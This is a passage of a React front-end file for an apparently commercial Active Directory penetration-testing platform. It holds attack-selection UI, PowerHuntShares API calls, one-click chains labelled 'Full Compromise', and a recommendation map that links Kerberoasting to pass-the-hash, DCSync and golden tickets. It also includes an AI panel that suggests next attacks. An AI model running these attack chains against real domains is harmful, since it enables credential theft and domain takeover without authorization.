      startTime: new Date().toISOString(),
      output: [`[*] Executing ${attack.name} using ${attack.tool}...`],
      aiAnalysis: null,
      poc_code: generatePoCCode(attack)
    };

    setAttackResults(prev => [newResult, ...prev]);

    // Check if it's a PowerHuntShares attack - execute via API
    if (attack.id.startsWith('powerhuntshares')) {
      try {
        let endpoint = '';
        let body = {
          domain: dcConfig.domain,
          username: dcConfig.username,
          password: dcConfig.password,
          dc_ip: dcConfig.dc_ip,
          threads: 10,
          scan_admin_shares: true,
          scan_hidden_shares: true
        };

        if (attack.id === 'powerhuntshares') {
          endpoint = '/api/v1/ad-tools/powerhuntshares/hunt';
        } else if (attack.id === 'powerhuntshares_excessive') {
          endpoint = '/api/v1/ad-tools/powerhuntshares/excessive-privileges';
        } else if (attack.id === 'powerhuntshares_highrisk') {
          endpoint = '/api/v1/ad-tools/powerhuntshares/high-risk';
        }

        const response = await fetch(`${API_BASE}${endpoint}`, {
          method: 'POST',
          headers: getAuthHeaders(),
          body: JSON.stringify(body)
        });

        const data = await response.json();

        if (response.ok) {
          const outputLines = [
            `[*] Executing ${attack.name} using ${attack.tool}`,
            `[*] Target Domain: ${dcConfig.domain}`,
            `[*] DC IP: ${dcConfig.dc_ip}`,
            `[*] MITRE ATT&CK: ${attack.mitre}`,
            `[+] PowerHuntShares scan completed!`,
            ``,
            `[+] Shares discovered: ${data.total_shares || 0}`,
            `[!] Risky shares found: ${data.risky_shares?.length || 0}`,
          ];

          if (data.shares && data.shares.length > 0) {
            outputLines.push(``, `[+] Top shares found:`);
            data.shares.slice(0, 5).forEach(share => {
              outputLines.push(`    \\\\${share.host}\\${share.share_name} - ${share.permissions || 'Unknown'}`);
            });
          }

          if (data.risky_shares && data.risky_shares.length > 0) {
            outputLines.push(``, `[!] HIGH RISK shares:`);
            data.risky_shares.slice(0, 5).forEach(share => {
              outputLines.push(`    [RISK] \\\\${share.host}\\${share.share_name} - ${share.risk_reason}`);
            });
          }

          setAttackResults(prev => prev.map(r =>
            r.id === newResult.id
              ? {
                  ...r,
                  status: 'completed',
                  endTime: new Date().toISOString(),
                  output: outputLines,
                  rawData: data,
                  aiAnalysis: aiAssistEnabled ? {
                    recommendation: data.risky_shares?.length > 0
                      ? `Warning! ${data.risky_shares.length} high-risk shares detected. Check permissions and sensitive files (web.config, scripts, backups).`
                      : 'No high-risk shares detected. Continue reconnaissance.',
                    nextSteps: [
                      'Analyze ACLs of discovered shares',
                      'Rechercher des fichiers de configuration',
                      'Check scripts with credentials'
                    ],
                    risk: data.risky_shares?.length > 0 ? 'high' : 'medium',
                    next_attacks: getNextAttacks(attack.id)
                  } : null
                }
              : r
          ));
          refreshStats();
        } else {
          throw new Error(data.detail || 'API error');
        }
      } catch (error) {
        console.error('PowerHuntShares error:', error);
        setAttackResults(prev => prev.map(r =>
          r.id === newResult.id
            ? {
                ...r,
                status: 'failed',
                endTime: new Date().toISOString(),
                output: [
                  `[*] Executing ${attack.name} using ${attack.tool}`,
                  `[*] Target: ${dcConfig.domain || 'Not configured'}`,
                  `[-] Error: ${error.message}`,
                  `[!] Make sure DC configuration is correct`,
                  `[!] PowerHuntShares requires: domain, username, password, dc_ip`
                ]
              }
            : r
        ));
        refreshStats();
      }
      setIsRunning(false);
      return;
    }

    // Default simulation for other attacks
    setTimeout(() => {
      setAttackResults(prev => prev.map(r =>
        r.id === newResult.id
          ? {
              ...r,
              status: 'completed',
              endTime: new Date().toISOString(),
              output: [
                `[*] Executing ${attack.name} using ${attack.tool}`,
                `[*] Target: ${dcConfig.domain || 'Not configured'}`,
                `[*] DC IP: ${dcConfig.dc_ip || 'Not configured'}`,
                `[*] MITRE ATT&CK: ${attack.mitre}`,
                `[+] Attack simulation completed`,
                `[!] Configure DC settings and connect API for real results`
              ],
              aiAnalysis: aiAssistEnabled ? {
                recommendation: 'This attack may reveal sensitive credentials. Recommendation: check highly privileged accounts.',
                nextSteps: ['Analyze results', 'Attempt lateral movement', 'Document findings'],
                risk: 'high',
                next_attacks: getNextAttacks(attack.id)
              } : null
            }
          : r
      ));
      setIsRunning(false);
      refreshStats();
    }, 3000);
  };

  // Get recommended next attacks
  const getNextAttacks = (currentAttackId) => {
    const attackChains = {
      'enum_users': ['bloodhound', 'kerberoast', 'powerhuntshares'],
      'bloodhound': ['kerberoast', 'asreproast', 'powerhuntshares'],
      'kerberoast': ['pass_the_hash', 'wmi_exec', 'dcsync'],
      'asreproast': ['pass_the_hash', 'password_spray'],
      'pass_the_hash': ['dcsync', 'sam_dump', 'lsass_dump'],
      'dcsync': ['golden_ticket', 'add_domain_admin'],
      'responder': ['pass_the_hash', 'ntlm_relay'],
      'enum_shares': ['powerhuntshares', 'powerhuntshares_excessive'],
      'powerhuntshares': ['powerhuntshares_excessive', 'powerhuntshares_highrisk', 'pass_the_hash'],
      'powerhuntshares_excessive': ['powerhuntshares_highrisk', 'gpp_passwords', 'sam_dump'],
      'powerhuntshares_highrisk': ['gpp_passwords', 'dpapi_dump', 'pass_the_hash'],
    };
    return attackChains[currentAttackId] || ['bloodhound', 'enum_users', 'powerhuntshares'];
  };

  const getColorClasses = (color) => {
    const colors = {
      blue: 'bg-blue-500/20 border-blue-500/50 text-blue-400',
      yellow: 'bg-yellow-500/20 border-yellow-500/50 text-yellow-400',
      orange: 'bg-orange-500/20 border-orange-500/50 text-orange-400',
      red: 'bg-red-500/20 border-red-500/50 text-red-400',
      purple: 'bg-purple-500/20 border-purple-500/50 text-purple-400',
      green: 'bg-green-500/20 border-green-500/50 text-green-400',
      pink: 'bg-pink-500/20 border-pink-500/50 text-pink-400',
      gray: 'bg-gray-500/20 border-gray-500/50 text-gray-400',
    };
    return colors[color] || colors.blue;
  };

  // Filter attacks
  const filteredCategories = attackCategories
    .filter(cat => selectedCategory === 'all' || cat.id === selectedCategory)
    .map(cat => ({
      ...cat,
      attacks: cat.attacks.filter(attack =>
        !searchTerm ||
        attack.name.toLowerCase().includes(searchTerm.toLowerCase()) ||
        attack.tool.toLowerCase().includes(searchTerm.toLowerCase()) ||
        attack.description.toLowerCase().includes(searchTerm.toLowerCase())
      )
    }))
    .filter(cat => cat.attacks.length > 0);

  return (
    <PlanRestrictedPage
      feature="ad_pentest"
      title="Active Directory Pentest"
      description="Outils d'attaque AD avec assistance IA"
      icon={Shield}
    >
    <CGUModal
      isOpen={showCGUModal}
      onClose={() => { setShowCGUModal(false); setPendingAttack(null); }}
      onAccept={handleCGUAccept}
      scanType={`Attaque AD: ${pendingAttack?.name || 'Active Directory'}`}
    />

    {/* AD Attack Wizard */}
    <ADAttackWizard
      open={showWizard}
      onClose={() => {
        setShowWizard(false);
        refreshStats(); // Refresh KPI stats after wizard closes
      }}
      initialDomain={dcConfig.domain}
      initialDcIp={dcConfig.dc_ip}
      initialCredentials={{
        username: dcConfig.username,
        password: dcConfig.password,
        hash: dcConfig.hash
      }}
      workspaceId={activeWorkspace?.id}
    />


    <div className="min-h-screen bg-brand-black p-6">
      <div className="w-[95%] sm:w-[92%] lg:w-[88%] laptop:w-[85%] 2xl:w-[80%] max-w-[1600px] laptop:max-w-[1700px] 2xl:max-w-[1800px] mx-auto space-y-6">
        {/* Welcome Banner */}
        <ADWelcomeBanner />

        {/* Header */}
        <div className="flex items-center justify-between flex-wrap gap-4">
          <div className="flex items-center gap-3">
            <Shield className="w-10 h-10 text-brand-green" />
            <div>
              <h1 className="text-4xl font-bold text-gradient-green">{t('ad.title')} Pentest</h1>
              <p className="text-gray-400 mt-2">{t('ad.description')}</p>
            </div>
          </div>
          <div className="flex items-center gap-3">
            <button
              onClick={() => setShowWizard(true)}
              className="flex items-center gap-2 px-4 py-2 rounded-lg bg-gradient-to-r from-brand-green to-green-600 text-white font-semibold hover:from-green-600 hover:to-green-700 transition-all shadow-lg shadow-green-500/20"
            >
              <Wand2 className="w-4 h-4" />
              {t('ad.attackWizard')}
            </button>
            {mainTab === 'ad_attacks' && (
              <button
                onClick={() => setShowAIPanel(!showAIPanel)}
                className={`flex items-center gap-2 px-4 py-2 rounded-lg transition-colors ${
                  showAIPanel
                    ? 'bg-blue-500 text-white'
                    : 'bg-blue-500/20 text-blue-400 hover:bg-blue-500/30'
                }`}
              >
                <Brain className="w-4 h-4" />
                Assistant IA
              </button>
            )}
          </div>
        </div>

        {/* Main Tabs - AD Attacks / LDAP Pentest */}
        <div className="flex gap-2 border-b border-gray-700">
          <button
            onClick={() => setMainTab('ad_attacks')}
            className={`px-6 py-3 flex items-center gap-2 border-b-2 transition-colors font-semibold ${
              mainTab === 'ad_attacks'
                ? 'border-brand-green text-brand-green'
                : 'border-transparent text-gray-400 hover:text-white hover:border-gray-500'
            }`}
          >
            <Shield className="w-5 h-5" />
            {t('ad.attacks')}
          </button>
          <button
            onClick={() => setMainTab('ldap')}
            className={`px-6 py-3 flex items-center gap-2 border-b-2 transition-colors font-semibold ${
              mainTab === 'ldap'
                ? 'border-cyan-500 text-cyan-400'
                : 'border-transparent text-gray-400 hover:text-white hover:border-gray-500'
            }`}
          >
            <FolderTree className="w-5 h-5" />
            {t('ad.ldapPentest')}
            <span className="ml-1 px-2 py-0.5 bg-cyan-500/20 text-cyan-400 rounded-full text-xs">
              ESC1-8
            </span>
          </button>
        </div>

        {/* LDAP Pentest Tab Content */}
        {mainTab === 'ldap' && (
          <LDAPScanPanel />
        )}

        {/* AD Attacks Tab Content */}
        {mainTab === 'ad_attacks' && (
          <>
        {/* Stats Cards */}
        <div className="grid grid-cols-2 md:grid-cols-3 lg:grid-cols-6 gap-4 overflow-x-auto">
          {/* Total Attacks */}
          <div className="bg-brand-black-light rounded-xl p-4 border border-brand-green/20 relative group cursor-help">
            <div className="flex items-center gap-3">
              <div className="w-10 h-10 rounded-full bg-brand-green/20 flex items-center justify-center">
                <Activity className="w-5 h-5 text-brand-green" />
              </div>
              <div>
                <div className="text-2xl font-bold text-white">{stats.total_attacks}</div>
                <div className="text-xs text-gray-500">{t('ad.stats.attacks')}</div>
              </div>
            </div>
            {/* Tooltip */}
            <div className="absolute bottom-full left-1/2 -translate-x-1/2 mb-2 w-64 p-3 bg-brand-black border border-brand-green/30 rounded-lg shadow-xl opacity-0 group-hover:opacity-100 transition-opacity duration-200 pointer-events-none z-50">
              <div className="flex items-center gap-2 mb-2">
                <Activity className="w-4 h-4 text-brand-green" />
                <span className="font-semibold text-white">Total Attaques AD</span>
              </div>
              <p className="text-xs text-gray-300">Nombre total de techniques d'attaque Active Directory executees (Kerberoasting, AS-REP Roasting, Pass-the-Hash, DCSync, etc.).</p>
            </div>
          </div>

          {/* Successful */}
          <div className="bg-brand-black-light rounded-xl p-4 border border-green-500/30 relative group cursor-help">
            <div className="flex items-center gap-3">
              <div className="w-10 h-10 rounded-full bg-green-500/20 flex items-center justify-center">
                <CheckCircle className="w-5 h-5 text-green-400" />
              </div>
              <div>
                <div className="text-2xl font-bold text-green-400">{stats.successful}</div>
                <div className="text-xs text-gray-500">{t('ad.stats.successful')}</div>
              </div>
            </div>
            {/* Tooltip */}
            <div className="absolute bottom-full left-1/2 -translate-x-1/2 mb-2 w-64 p-3 bg-brand-black border border-green-500/30 rounded-lg shadow-xl opacity-0 group-hover:opacity-100 transition-opacity duration-200 pointer-events-none z-50">
              <div className="flex items-center gap-2 mb-2">
                <CheckCircle className="w-4 h-4 text-green-400" />
                <span className="font-semibold text-white">Successful Attacks</span>
              </div>
              <p className="text-xs text-gray-300">Attaques ayant abouti avec succes. Ces failles confirment des vulnerabilites exploitables dans l'infrastructure AD.</p>
            </div>
          </div>

          {/* Failed */}
          <div className="bg-brand-black-light rounded-xl p-4 border border-red-500/30 relative group cursor-help">
            <div className="flex items-center gap-3">
              <div className="w-10 h-10 rounded-full bg-red-500/20 flex items-center justify-center">
                <XCircle className="w-5 h-5 text-red-400" />
              </div>
              <div>
                <div className="text-2xl font-bold text-red-400">{stats.failed}</div>
                <div className="text-xs text-gray-500">{t('ad.stats.failed')}</div>
              </div>
            </div>
            {/* Tooltip */}
            <div className="absolute bottom-full left-1/2 -translate-x-1/2 mb-2 w-64 p-3 bg-brand-black border border-red-500/30 rounded-lg shadow-xl opacity-0 group-hover:opacity-100 transition-opacity duration-200 pointer-events-none z-50">
              <div className="flex items-center gap-2 mb-2">
                <XCircle className="w-4 h-4 text-red-400" />
                <span className="font-semibold text-white">Failed Attacks</span>
              </div>
              <p className="text-xs text-gray-300">Attaques n'ayant pas abouti. Cela peut indiquer des protections en place ou des prerequis non remplis.</p>
            </div>
          </div>

          {/* Credentials Found */}
          <div className="bg-brand-black-light rounded-xl p-4 border border-yellow-500/30 relative group cursor-help">
            <div className="flex items-center gap-3">
              <div className="w-10 h-10 rounded-full bg-yellow-500/20 flex items-center justify-center">
                <Key className="w-5 h-5 text-yellow-400" />
              </div>
              <div>
                <div className="text-2xl font-bold text-yellow-400">{stats.credentials_found}</div>
                <div className="text-xs text-gray-500">{t('ad.stats.credentials')}</div>
              </div>
            </div>
            {/* Tooltip */}
            <div className="absolute bottom-full left-1/2 -translate-x-1/2 mb-2 w-64 p-3 bg-brand-black border border-yellow-500/30 rounded-lg shadow-xl opacity-0 group-hover:opacity-100 transition-opacity duration-200 pointer-events-none z-50">
              <div className="flex items-center gap-2 mb-2">
                <Key className="w-4 h-4 text-yellow-400" />
                <span className="font-semibold text-white">Credentials Trouves</span>
              </div>
              <p className="text-xs text-gray-300">Nombre de credentials recuperes (hashes NTLM, tickets Kerberos, mots de passe en clair). Utilisables pour le mouvement lateral.</p>
            </div>
          </div>

          {/* Users Enumerated */}
          <div className="bg-brand-black-light rounded-xl p-4 border border-blue-500/30 relative group cursor-help">
            <div className="flex items-center gap-3">
              <div className="w-10 h-10 rounded-full bg-blue-500/20 flex items-center justify-center">
                <Users className="w-5 h-5 text-blue-400" />
              </div>
              <div>
                <div className="text-2xl font-bold text-blue-400">{stats.users_enumerated}</div>
                <div className="text-xs text-gray-500">{t('ad.stats.users')}</div>
              </div>
            </div>
            {/* Tooltip */}
            <div className="absolute bottom-full left-1/2 -translate-x-1/2 mb-2 w-64 p-3 bg-brand-black border border-blue-500/30 rounded-lg shadow-xl opacity-0 group-hover:opacity-100 transition-opacity duration-200 pointer-events-none z-50">
              <div className="flex items-center gap-2 mb-2">
                <Users className="w-4 h-4 text-blue-400" />
                <span className="font-semibold text-white">Utilisateurs Enumeres</span>
              </div>
              <p className="text-xs text-gray-300">Comptes utilisateurs AD decouverts. Inclut les comptes de service, administrateurs et utilisateurs standards.</p>
            </div>
          </div>

          {/* Paths Discovered */}
          <div className="bg-brand-black-light rounded-xl p-4 border border-purple-500/30 relative group cursor-help">
            <div className="flex items-center gap-3">
              <div className="w-10 h-10 rounded-full bg-purple-500/20 flex items-center justify-center">
                <Network className="w-5 h-5 text-purple-400" />
              </div>
              <div>
                <div className="text-2xl font-bold text-purple-400">{stats.paths_discovered}</div>
                <div className="text-xs text-gray-500">{t('ad.stats.paths')}</div>
              </div>
            </div>
            {/* Tooltip */}
            <div className="absolute bottom-full left-1/2 -translate-x-1/2 mb-2 w-64 p-3 bg-brand-black border border-purple-500/30 rounded-lg shadow-xl opacity-0 group-hover:opacity-100 transition-opacity duration-200 pointer-events-none z-50">
              <div className="flex items-center gap-2 mb-2">
                <Network className="w-4 h-4 text-purple-400" />
                <span className="font-semibold text-white">Chemins d'Attaque</span>
              </div>
              <p className="text-xs text-gray-300">Compromise paths identified toward privileged accounts (Domain Admin). Analysis of AD relationships and delegations.</p>
            </div>
          </div>
        </div>

        {/* AI Assistant Panel */}
        {showAIPanel && (
          <div className="bg-brand-black-light rounded-xl border border-blue-500/30 overflow-hidden">
            <div className="p-4 border-b border-blue-500/20 bg-blue-500/10">
              <h3 className="text-lg font-bold text-white flex items-center gap-2">
                <Brain className="w-5 h-5 text-blue-400" />
                Assistant IA - Strategie AD
                <span className="ml-2 text-xs px-2 py-0.5 bg-blue-500/20 text-blue-400 rounded">IA</span>
              </h3>
            </div>

            <div className="p-4 space-y-4">
              {/* Quick prompts */}
              <div className="flex flex-wrap gap-2">
                {aiQuickPrompts.map((prompt, i) => (
                  <button
                    key={i}
                    onClick={() => askAI(prompt.query)}
                    disabled={aiLoading}
                    className="px-3 py-1.5 bg-blue-500/10 text-blue-400 rounded-lg hover:bg-blue-500/20 transition-colors flex items-center gap-2 text-sm"
                  >
                    <prompt.icon className="w-4 h-4" />
                    {prompt.label}
                  </button>
                ))}
              </div>

              {/* Custom query input */}
              <div className="flex gap-2">
                <input
                  type="text"
                  value={aiQuery}
                  onChange={(e) => setAiQuery(e.target.value)}
                  onKeyPress={(e) => e.key === 'Enter' && aiQuery && askAI(aiQuery)}
                  placeholder="Ask a question about AD attacks, techniques, strategy..."
                  className="flex-1 px-4 py-2 bg-brand-black border border-gray-700 rounded-lg text-white placeholder-gray-400 focus:border-blue-500 focus:ring-1 focus:ring-blue-500"
                />
                <button
                  onClick={() => aiQuery && askAI(aiQuery)}
                  disabled={aiLoading || !aiQuery}
                  className="px-4 py-2 bg-blue-500 text-white rounded-lg hover:bg-blue-600 transition-colors flex items-center gap-2 disabled:opacity-50"
                >
                  {aiLoading ? (
                    <RefreshCw className="w-4 h-4 animate-spin" />
                  ) : (
                    <Sparkles className="w-4 h-4" />
                  )}
                  Analyser
                </button>
              </div>

              {/* AI Response */}
              {aiResponse && (
                <div className="bg-brand-black rounded-lg p-4 border border-gray-700">
                  <div className="flex items-start gap-3">
                    <div className="w-8 h-8 rounded-full bg-blue-500/20 flex items-center justify-center flex-shrink-0">
                      <Bot className="w-4 h-4 text-blue-400" />
                    </div>
                    <div className="flex-1 min-w-0">
                      <div className="flex items-center gap-2 mb-2">
                        <span className="text-sm text-gray-400">Reponse IA</span>
                        {aiResponse.isLocal && (
                          <span className="text-xs px-1.5 py-0.5 bg-yellow-500/20 text-yellow-400 rounded">Local</span>
                        )}
                      </div>
                      <pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
                        {aiResponse.response}
                      </pre>

                      {/* Recommended attacks */}
                      {aiResponse.attacks_recommended && aiResponse.attacks_recommended.length > 0 && (
                        <div className="mt-3 pt-3 border-t border-gray-700">
                          <div className="text-xs text-gray-500 mb-2">Attaques recommandees:</div>
                          <div className="flex flex-wrap gap-2">
                            {aiResponse.attacks_recommended.map((attackId, i) => {
                              const attack = attackCategories
                                .flatMap(c => c.attacks)
                                .find(a => a.id === attackId);
                              return attack ? (
                                <button
                                  key={i}
                                  onClick={() => handleAttackClick(attack)}
                                  disabled={isRunning}
                                  className="px-2 py-1 bg-brand-green/10 text-brand-green rounded text-xs hover:bg-brand-green/20 transition-colors flex items-center gap-1"
                                >
                                  <Play className="w-3 h-3" />
                                  {attack.name}
                                </button>
                              ) : null;
                            })}
                          </div>
                        </div>
                      )}

                      {/* Suggestions */}
                      {aiResponse.suggestions && aiResponse.suggestions.length > 0 && (
                        <div className="mt-3 pt-3 border-t border-gray-700">
                          <div className="text-xs text-gray-500 mb-2">Actions suggerees:</div>
                          <div className="flex flex-wrap gap-2">
                            {aiResponse.suggestions.map((suggestion, i) => (
                              <button
                                key={i}
                                onClick={() => askAI(suggestion)}
                                className="px-2 py-1 bg-blue-500/10 text-blue-400 rounded text-xs hover:bg-blue-500/20 transition-colors flex items-center gap-1"
                              >
                                <Lightbulb className="w-3 h-3" />
                                {suggestion}
                              </button>
                            ))}
                          </div>
                        </div>
                      )}
                    </div>
                  </div>
                </div>
              )}
            </div>
          </div>
        )}

        {/* PoC Auto Panel */}
        {showPoCPanel && (
          <div className="bg-brand-black-light rounded-xl border border-purple-500/30 overflow-hidden">
            <div className="p-4 border-b border-purple-500/20 bg-purple-500/10">
              <h3 className="text-lg font-bold text-white flex items-center gap-2">
                <Rocket className="w-5 h-5 text-purple-400" />
                Exploit Auto - AD Attack Chain
                <span className="ml-2 text-xs px-2 py-0.5 bg-purple-500/20 text-purple-400 rounded">1-Click</span>
              </h3>
              <p className="text-sm text-gray-400 mt-1">
                Select attacks to execute automatically in a chain
              </p>
            </div>

            <div className="p-4 space-y-4">
              {/* Attack chain selection */}
              <div className="grid grid-cols-2 md:grid-cols-3 lg:grid-cols-4 gap-2 max-h-[200px] overflow-y-auto">
                {attackCategories.flatMap(cat => cat.attacks).map((attack) => (
                  <div
                    key={attack.id}
                    onClick={() => {
                      if (selectedAttacks.includes(attack.id)) {
                        setSelectedAttacks(prev => prev.filter(id => id !== attack.id));
                      } else {
                        setSelectedAttacks(prev => [...prev, attack.id]);
                      }
                    }}
                    className={`p-2 rounded-lg border cursor-pointer transition-all ${
                      selectedAttacks.includes(attack.id)
                        ? 'border-purple-500 bg-purple-500/10'
                        : 'border-gray-700 bg-brand-black hover:border-purple-500/50'
                    }`}
                  >
                    <div className="flex items-center gap-2">
                      <input
                        type="checkbox"
                        checked={selectedAttacks.includes(attack.id)}
                        onChange={() => {}}
                        className="w-4 h-4 rounded border-gray-400 bg-brand-black text-purple-500"
                      />
                      <div className="text-xs">
                        <div className="text-white font-medium truncate">{attack.name}</div>
                        <div className="text-gray-500">{attack.tool}</div>
                      </div>
                    </div>
                  </div>
                ))}
              </div>

              {/* Predefined chains */}
              <div className="flex flex-wrap gap-2">
                <span className="text-xs text-gray-500">Predefined chains:</span>
                <button
                  onClick={() => setSelectedAttacks(['enum_users', 'bloodhound', 'kerberoast', 'pass_the_hash'])}
                  className="px-2 py-1 bg-purple-500/10 text-purple-400 rounded text-xs hover:bg-purple-500/20"
                >
                  Recon + Kerberoast
                </button>
                <button
                  onClick={() => setSelectedAttacks(['responder', 'ntlm_relay', 'sam_dump'])}
                  className="px-2 py-1 bg-purple-500/10 text-purple-400 rounded text-xs hover:bg-purple-500/20"
                >
                  NTLM Capture
                </button>
                <button
                  onClick={() => setSelectedAttacks(['bloodhound', 'dcsync', 'golden_ticket'])}
                  className="px-2 py-1 bg-purple-500/10 text-purple-400 rounded text-xs hover:bg-purple-500/20"
                >
                  Full Compromise
                </button>
              </div>

              {/* Actions */}
              <div className="flex items-center justify-between pt-3 border-t border-gray-700">
                <div className="text-sm text-gray-400">
                  {selectedAttacks.length} attaque(s) selectionnee(s)
                </div>
                <div className="flex gap-2">
                  <button
                    onClick={() => {
                      if (selectedAttacks.length > 0) {
                        const attack = attackCategories
                          .flatMap(c => c.attacks)
                          .find(a => a.id === selectedAttacks[0]);
                        if (attack) {
                          const code = generatePoCCode(attack);
                          navigator.clipboard.writeText(code);
                          alert('PoC code copied to clipboard!');
                        }
                      }
                    }}
                    disabled={selectedAttacks.length === 0}
                    className="px-4 py-2 bg-gray-700 text-white rounded-lg hover:bg-gray-600 transition-colors flex items-center gap-2 disabled:opacity-50"
                  >
                    <Code className="w-4 h-4" />
                    Generate Code
                  </button>
                  <button
                    onClick={executeAutoPoCChain}
                    disabled={selectedAttacks.length === 0 || pocLoading}
                    className="px-4 py-2 bg-purple-500 text-white rounded-lg hover:bg-purple-600 transition-colors flex items-center gap-2 disabled:opacity-50"
                  >
                    {pocLoading ? (
                      <RefreshCw className="w-4 h-4 animate-spin" />
                    ) : (
                      <Play className="w-4 h-4" />
                    )}
                    Execute Chain
                  </button>
                </div>
              </div>

              {/* PoC Results */}
              {pocResults.length > 0 && (
                <div className="space-y-2 pt-3 border-t border-gray-700">
                  <div className="text-sm text-gray-400">Chain results:</div>
                  {pocResults.map((result, i) => (
                    <div
                      key={i}
                      className={`p-3 rounded-lg border ${
                        result.status === 'completed'
                          ? 'border-green-500/50 bg-green-500/10'
                          : result.status === 'running'
                          ? 'border-yellow-500/50 bg-yellow-500/10'
                          : 'border-red-500/50 bg-red-500/10'
                      }`}
                    >
                      <div className="flex items-center gap-2">
                        {result.status === 'completed' ? (
                          <CheckCircle className="w-4 h-4 text-green-400" />
                        ) : result.status === 'running' ? (
                          <Loader2 className="w-4 h-4 text-yellow-400 animate-spin" />
                        ) : (
                          <XCircle className="w-4 h-4 text-red-400" />
                        )}
                        <span className="text-white font-medium">{result.attack_name}</span>
                        <span className="text-xs text-gray-500">{result.tool}</span>
                        <button
                          onClick={() => {
                            navigator.clipboard.writeText(result.poc_code);
                            alert('Code copie!');
                          }}
                          className="ml-auto px-2 py-1 bg-gray-700 text-gray-300 rounded text-xs hover:bg-gray-600 flex items-center gap-1"
                        >
                          <Copy className="w-3 h-3" />
                          Copier PoC
                        </button>
                      </div>
                    </div>
                  ))}
                </div>
              )}
            </div>
          </div>
        )}

        {/* DC Configuration */}
        <div className="bg-brand-black-light rounded-xl p-6 border border-brand-green/30">
          <div className="flex items-center gap-2 mb-4">
            <Server className="w-6 h-6 text-brand-green" />
            <h2 className="text-xl font-bold text-brand-green">{t('ad.dcConfiguration')}</h2>
          </div>
          <div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-5 gap-4">
            <div>
              <label className="block text-sm font-medium text-gray-400 mb-2">{t('ad.domain')}</label>
              <input
                type="text"
                placeholder="corp.local"
                value={dcConfig.domain}
                onChange={(e) => setDcConfig({...dcConfig, domain: e.target.value})}
                className="w-full px-3 py-2 bg-brand-black border border-gray-700 rounded-lg text-white placeholder-gray-400 focus:border-brand-green"
              />
            </div>
            <div>
              <label className="block text-sm font-medium text-gray-400 mb-2">{t('ad.dcIp')}</label>
              <input
                type="text"
                placeholder="192.168.1.10"
                value={dcConfig.dc_ip}
                onChange={(e) => setDcConfig({...dcConfig, dc_ip: e.target.value})}
                className="w-full px-3 py-2 bg-brand-black border border-gray-700 rounded-lg text-white placeholder-gray-400 focus:border-brand-green"
              />
            </div>
            <div>
              <label className="block text-sm font-medium text-gray-400 mb-2">{t('ad.username')}</label>
              <input
                type="text"
                placeholder="admin"
                value={dcConfig.username}
                onChange={(e) => setDcConfig({...dcConfig, username: e.target.value})}
                className="w-full px-3 py-2 bg-brand-black border border-gray-700 rounded-lg text-white placeholder-gray-400 focus:border-brand-green"
              />
            </div>
            <div>
              <label className="block text-sm font-medium text-gray-400 mb-2">{t('ad.password')}</label>
              <div className="relative">
                <input
                  type={showPassword ? 'text' : 'password'}
                  placeholder="********"
                  value={dcConfig.password}
                  onChange={(e) => setDcConfig({...dcConfig, password: e.target.value})}
                  className="w-full px-3 py-2 bg-brand-black border border-gray-700 rounded-lg text-white placeholder-gray-400 focus:border-brand-green"
                />
                <button
                  type="button"
                  onClick={() => setShowPassword(!showPassword)}
                  className="absolute right-2 top-1/2 -translate-y-1/2 text-gray-500 hover:text-white"
                >
                  {showPassword ? <EyeOff className="w-4 h-4" /> : <Eye className="w-4 h-4" />}
                </button>
              </div>
            </div>
            <div>
              <label className="block text-sm font-medium text-gray-400 mb-2">{t('ad.ntlmHash')}</label>
              <input
                type="text"
                placeholder="aad3b435b51404eeaad3b435b51404ee:..."
                value={dcConfig.hash}
                onChange={(e) => setDcConfig({...dcConfig, hash: e.target.value})}
                className="w-full px-3 py-2 bg-brand-black border border-gray-700 rounded-lg text-white placeholder-gray-400 focus:border-brand-green"
              />
            </div>
          </div>
        </div>

        {/* Search and Filters */}
        <div className="bg-brand-black-light rounded-xl p-4 border border-brand-green/20">
          <div className="flex flex-wrap items-center gap-4">
            <div className="flex-1 min-w-[200px] relative">
              <Search className="absolute left-3 top-1/2 -translate-y-1/2 w-4 h-4 text-gray-500" />
              <input
                type="text"
                value={searchTerm}
                onChange={(e) => setSearchTerm(e.target.value)}
                placeholder={t('ad.searchPlaceholder')}
                className="w-full pl-10 pr-4 py-2 bg-brand-black border border-gray-700 rounded-lg text-white placeholder-gray-400 focus:border-brand-green"
              />
            </div>

            <div className="flex items-center gap-2">
              <Filter className="w-4 h-4 text-gray-500" />
              <select
                value={selectedCategory}
                onChange={(e) => setSelectedCategory(e.target.value)}
                className="px-3 py-2 bg-brand-black border border-gray-700 rounded-lg text-white"
              >
                <option value="all">{t('ad.allCategories')}</option>
                {attackCategories.map(cat => (
                  <option key={cat.id} value={cat.id}>{cat.name}</option>
                ))}
              </select>
            </div>

            <div className="flex items-center gap-1 bg-brand-black rounded-lg p-1 border border-gray-700">
              <button
                onClick={() => setViewMode('grid')}
                className={`p-2 rounded ${viewMode === 'grid' ? 'bg-brand-green text-black' : 'text-gray-400 hover:text-white'}`}
              >
                <Grid className="w-4 h-4" />
              </button>
              <button
                onClick={() => setViewMode('list')}
                className={`p-2 rounded ${viewMode === 'list' ? 'bg-brand-green text-black' : 'text-gray-400 hover:text-white'}`}
              >
                <List className="w-4 h-4" />
              </button>
            </div>
          </div>
        </div>

        {/* AD Pentest Results Table — Wizard sessions (71 techniques OCD) + PingCastle audits */}
        <ADPentestResultsTable dcConfig={dcConfig} workspaceId={activeWorkspace?.id} />

        <div className="grid grid-cols-1 lg:grid-cols-3 gap-6">
          {/* Attack Categories */}
          <div className="lg:col-span-2 space-y-4 flex flex-col">
            <h2 className="text-xl font-bold text-brand-green">{t('ad.attackCategories')}</h2>
            <div className="flex-1 space-y-4 min-h-[600px]">
            {filteredCategories.map((category) => (
              <div
                key={category.id}
                className="bg-brand-black-light rounded-xl border border-gray-800 hover:border-brand-green/30 transition-colors overflow-hidden"
              >
                <div
                  className="p-4 cursor-pointer flex items-center justify-between"
                  onClick={() => setExpandedCategory(expandedCategory === category.id ? null : category.id)}
                >
                  <div className="flex items-center gap-3">
                    <div className={`p-2 rounded-lg ${getColorClasses(category.color)}`}>
                      {category.icon}
                    </div>
                    <div>
                      <h3 className="text-lg font-bold text-white">{category.name}</h3>
                      <p className="text-sm text-gray-500">{category.description}</p>
                    </div>
                  </div>
                  <div className="flex items-center gap-3">
                    <span className="text-sm text-gray-500">{category.attacks.length} {t('ad.attacks').toLowerCase()}</span>
                    {expandedCategory === category.id ? (
                      <ChevronUp className="w-5 h-5 text-gray-400" />
                    ) : (
                      <ChevronDown className="w-5 h-5 text-gray-400" />
                    )}
                  </div>
                </div>

